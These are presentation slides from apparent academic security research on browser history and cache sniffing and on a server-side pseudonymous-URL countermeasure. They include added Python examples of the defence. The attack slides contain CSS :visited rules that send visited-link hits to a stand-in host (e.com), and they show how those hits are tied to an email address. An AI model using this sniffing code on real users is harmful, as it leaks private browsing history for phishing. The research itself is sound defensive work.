Invasive Browser Sniffing and Countermeasures

Markus Jakobsson & Sid Stamm


Context Aware Attacks

Data about targets obtained

Used to customize emails

Yields higher vulnerability rate


Context: Social Networks

  • Mine site for relationships (Alice knows Bob)

  • Spoof email from victim’s friend

  • People trust their friends (and that which spoofs them)


Context: Browser-Recon

  • Phisher mines browsers

    • Browsing history

    • Cached data

  • Attacker can discover affiliations

  • Easy to pair browser history with email address


Context: Cache Recon

Pic1.jpg is Not in Cache (pic1.jpg is not cached)

GET /index.html
GET /pics/pic1.jpg
GET /pics/pic2.jpg


Context: Cache Recon

Pic1.jpg IS in Cache (pic1.jpg is cached)

GET /index.html


Context: Cache Recon

GET pic1.jpg
GET logout.jpg
GET pic2.jpg

(Felten & Schneider, “Timing Attacks on Web Privacy”, 7th ACM Conference in Computer & Communication Security, 2000.)


Context: History Recon

The Code:

<style>
a { color: blue; }
#id1:visited { color: red; }
#id2:visited { color: red; }
#id3:visited { color: red; }
</style>
<a id=id1 href="x.com">Link 1</a>
<a id=id2 href="y.com">Link 2</a>
<a id=id3 href="z.com">Link 3</a>

What You See:

Link 1
Link 2
Link 3


Context: History Recon

The Code:

<style>
a { color: blue; }
#id1:visited {
  background: url('e.com/?id=1');
}
#id2:visited {
  background: url('e.com/?id=2');
}
</style>
<a id=id1 href="x.com">Link 1</a>
<a id=id2 href="y.com">Link 2</a>
<a id=id3 href="z.com">Link 3</a>

What You See:

Link 1
Link 2
Link 3


Context: History Recon

The Code:

<style>
a { color: blue; }
#id1:visited {
  background: url('e.com/?id=1');
}
#id2:visited {
  background: url('e.com/?id=2');
}
</style>
<a id=id1 href="x.com"></a>
<a id=id2 href="y.com"></a>
<a id=id3 href="z.com"></a>

What You See:

(nothing visible: the links have no text)


History Recon + Email

GET [email protected]

(lots of links)

GET /hit?id=1&[email protected]

GET /hit?id=42&[email protected]

Phisher can now associate Alice with link 1 and 42

Auto-Fill Identity Extraction


“Chameleon” Attack


Solutions to Browser-recon

  • Client-Side Solutions:

    • Jackson, Bortz, Boneh, Mitchell, “Protecting browser state from web privacy attacks”, To appear in WWW06, 2006.

    • CSS limiting

    • “User-Paranoia” (regularly clear history, cache, keep no bookmarks)

  • Server-Side Solution:

    • Make URLs impossible to guess


Solution Goals

Requirements

  • Hard to guess any pages or resources served by SP

  • Search engines can still index and search SP


Formal Goal Specification


Solution Techniques

  • Two techniques:

    • Customize URLs with pseudonyms: http://chase.com/page.html?39fc938f

    • Pollute Client State (fill cache/history with related sites not visited by client)

  • Hiding vs. obfuscating

    • Internal (protected) URLs hidden

    • Entry point (public) URLs obfuscated


Solution to Browser-recon

[Diagram labels: C, S; request: GET /]


Solution to Browser-recon

[Diagram labels: C, T, ST, SB, Domain of S; requests: GET /?13fc021b, GET /]


Pseudonyms

  • Establishing a pseudonym

  • Using a pseudonym

  • Pseudonym validity check

    • Via Cookies

    • Via HTTP-REFERER

    • Via Message Authentication Codes
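
One way to establish, use and check a pseudonym with a message authentication code, as an added example rather than the authors' prototype code. Assumptions: the HMAC-SHA256 construction, the key, the `client_binding` string, the 302 redirect and all function names; only the 64-bit random value comes from the prototype slide.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # assumption: MAC key known only to the server side
NONCE_HEX = 16                        # 64 random bits, the size given on the prototype slide
TAG_HEX = 16                          # assumption: MAC truncated to 64 bits

def mac_tag(nonce_hex: str, client_binding: str) -> bytes:
    """MAC over the random part and whatever the deployment ties a pseudonym to."""
    msg = f"{nonce_hex}|{client_binding}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()[:TAG_HEX].encode()

def establish_pseudonym(client_binding: str) -> str:
    """Establishing: fresh 64-bit random value followed by its MAC."""
    nonce_hex = secrets.token_hex(NONCE_HEX // 2)
    return nonce_hex + mac_tag(nonce_hex, client_binding).decode()

def is_valid(pseudonym: str, client_binding: str) -> bool:
    """Validity check: accept only pseudonyms this server issued for this binding."""
    if len(pseudonym) != NONCE_HEX + TAG_HEX:
        return False
    nonce_hex, tag = pseudonym[:NONCE_HEX], pseudonym[NONCE_HEX:]
    # Constant-time comparison so the check does not leak how much of the tag matched.
    return hmac.compare_digest(tag.encode(), mac_tag(nonce_hex, client_binding))

def handle_request(path: str, query: str, client_binding: str):
    """Using: serve requests with a valid pseudonym, otherwise redirect to a
    freshly pseudonymed URL (assumed here to be an HTTP 302)."""
    if is_valid(query, client_binding):
        return 200, path
    return 302, f"{path}?{establish_pseudonym(client_binding)}"

if __name__ == "__main__":
    status, location = handle_request("/", "", "session-A")  # constructed sample request
    print(status, location)
    print(handle_request("/", location.split("?", 1)[1], "session-A"))
    print(handle_request("/", location.split("?", 1)[1], "session-B"))
```
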


Pseudonyms

  • Robot Policies

    • Dealing with search engines

    • Robots.txt “standard” (no problem if cheating)

  • Pollution Policy

    • Pollute entrance URLs

    • How to choose pollutants?

  • What about links to offsite data?

  • Bookmarks?


Example

[Diagram labels: C, Bank.com, 10.0.0.1; requests: GET /page.html?83fa029, GET /page.html]


Example

<a href='http://www.g.com'>Go to G</a>
<a href='http://10.0.0.1/login.jsp'>Log in</a>
<img src='/img/hi.gif'>

[Diagram labels: hm, Bank.com, 10.0.0.1, C]


Example

<a href='http://www.g.com'>Go to G</a>
<a href='http://Bank.com/login.jsp'>Log in</a>
<img src='/img/hi.gif'>

[Diagram labels: hm, Bank.com, 10.0.0.1, C]


Example

<a href='http://Bank.com/redir?www.g.com'>Go to G</a>
<a href='http://Bank.com/login.jsp'>Log in</a>
<img src='/img/hi.gif'>

[Diagram labels: hm, Bank.com, 10.0.0.1, C]


Example

<a href='http://Bank.com/redir?www.g.com?83fa029'>Go to G</a>
<a href='http://Bank.com/login.jsp?83fa029'>Log in</a>
<img src='/img/hi.gif?83fa029'>

[Diagram labels: hm, Bank.com, 10.0.0.1, C]


Example

<a href='http://Bank.com/redir?www.g.com?83fa029'>Go to G</a>
<a href='http://Bank.com/login.jsp?83fa029'>Log in</a>
<img src='/img/hi.gif?83fa029'>

[Diagram labels: T, Bank.com, 10.0.0.1, C]
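
The rewriting that the Example slides step through (internal address replaced by Bank.com, offsite links routed through /redir, pseudonym appended to every URL), as an added example that is not the authors' prototype code. The function names and the regex-based matching are assumptions; the hosts, the pseudonym 83fa029 and the sample page are the ones on the slides.

```python
import re
from urllib.parse import urlsplit

PUBLIC_HOST = "Bank.com"    # public name on the slides
INTERNAL_HOST = "10.0.0.1"  # back-end address on the slides

# Simplification (assumption): match quoted href/src attributes with a regex
# instead of running a full HTML parser.
ATTR = re.compile(r"""\b(href|src)=(['"])(.*?)\2""", re.IGNORECASE)

def rewrite_url(url: str, pseudonym: str) -> str:
    parts = urlsplit(url)
    if url.startswith("#") or parts.scheme not in ("", "http", "https"):
        return url                      # fragments, mailto: and similar are left alone
    tail = parts.path + (f"?{parts.query}" if parts.query else "")
    if not parts.netloc:                # relative URL, already on-site
        new = url
    elif parts.netloc.lower() in (INTERNAL_HOST, PUBLIC_HOST.lower()):
        new = f"http://{PUBLIC_HOST}{tail or '/'}"             # hide the internal address
    else:                               # offsite link goes through the redirector
        new = f"http://{PUBLIC_HOST}/redir?{parts.netloc}{tail}"
    return f"{new}?{pseudonym}"         # slide format: pseudonym appended after '?'

def translate(html: str, pseudonym: str) -> str:
    """Rewrite every href/src in a back-end page for one client's pseudonym."""
    def repl(m):
        return f"{m.group(1)}={m.group(2)}{rewrite_url(m.group(3), pseudonym)}{m.group(2)}"
    return ATTR.sub(repl, html)

def to_backend(request_target: str) -> str:
    """Strip the trailing ?pseudonym before the request is passed to the back end."""
    head, sep, _ = request_target.rpartition("?")
    return head if sep else request_target

# The back-end page from the slides, before translation.
BACKEND_PAGE = (
    "<a href='http://www.g.com'>Go to G</a>\n"
    "<a href='http://10.0.0.1/login.jsp'>Log in</a>\n"
    "<img src='/img/hi.gif'>"
)

if __name__ == "__main__":
    print(translate(BACKEND_PAGE, "83fa029"))
    print(to_backend("/page.html?83fa029"))
```
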


Client’s Perception


Policies

  • Offsite Redirection Policy

  • Data Replacement Policy

  • Client vs. Robot Distinction


Special Cases

Shared/Transfer Pseudonyms

Cache pollution reciprocity


Prototype Details

[Diagram labels: SB, ST]

  • Java App simulating an HTTP server

  • Pseudonyms: 64-bit random number

    • java.security.SecureRandom

  • Experimental Client:

    • Shell script + CURL


Experimental Results


General Considerations

  • Forwarding user-agent

  • Translate Cookies

  • Optimizations


?

Invasive Browser Sniffing and Countermeasures

Markus Jakobsson & Sid Stamm

